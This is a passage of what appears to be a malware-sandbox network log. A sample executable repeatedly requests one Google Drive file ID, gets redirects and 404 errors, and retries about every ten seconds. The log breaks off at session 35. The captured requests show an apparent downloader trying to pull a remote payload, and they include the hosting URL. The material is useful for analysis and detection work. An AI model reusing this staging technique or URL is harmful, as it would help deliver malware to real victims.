                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-Rp3Qo15Yqz2H6IOxMRJnwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          27 | 192.168.11.20 | 49773 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:34:34 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:34 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6b4nxUtM48yAR1ZBuO4biwPKd3tdXouRKAbMVj5U55tuVtehXX0n9i9EMGa5n3JYYjCIQYP2s
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:34 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-WfPEWujkleLhr6wVvKm7zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:34 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-JjXLUz_o2nU_Lok5zGHWQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          28 | 192.168.11.20 | 49774 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:34:45 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:45 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:45 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-CrfWIZ1Qj6mqBzh92Z8EqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          29 | 192.168.11.20 | 49775 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:34:45 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:45 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6rviVyHLoy3-nG-CuXrfbQ6P8mnMuGlGZlbHpw-j6LDAFi7V9gZTiMcmzg9jazfgSibDpSIBE
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:45 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: script-src 'nonce-1oCRabKA1pxrLDpkYjV2mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:45 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9fFsH4VM6IVGii_3u2NCzw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          30 | 192.168.11.20 | 49776 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:34:56 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:56 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:56 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-lP5DaGPTwBCSJBuLyxdOkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          31 | 192.168.11.20 | 49777 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:34:56 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:57 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC45-i7YH9HgbwTZoFCrGyKRyVgEQlrBnLxE2vDMWXYSEBg3Dsfmtht0qa1UYFa0f-E2
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:57 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-SJ7dBqLYgQFCMsI7lb0qgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:57 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yZHA1NMXWIx32Txp9KqvlQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          32 | 192.168.11.20 | 49778 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:35:07 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:07 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:07 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce--hSotlMiLEg9AAvZ2jUa7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          33 | 192.168.11.20 | 49779 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:35:11 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:11 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC7X79WSwMnVC6Dk6SezQM-LvXn1WZhUNpqNpv9HB60POcagnGdD8CIdlMJkzbopNMRY
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:11 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-XuSKyxWzvXdaWTilRNBcJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:35:11 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Mff5JprHK9WnqqdLITkLqA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          34 | 192.168.11.20 | 49780 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:35:21 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:35:21 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:35:21 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-NQ1HJASmv8F8wEr1pOHDEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          35 | 192.168.11.20 | 49781 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
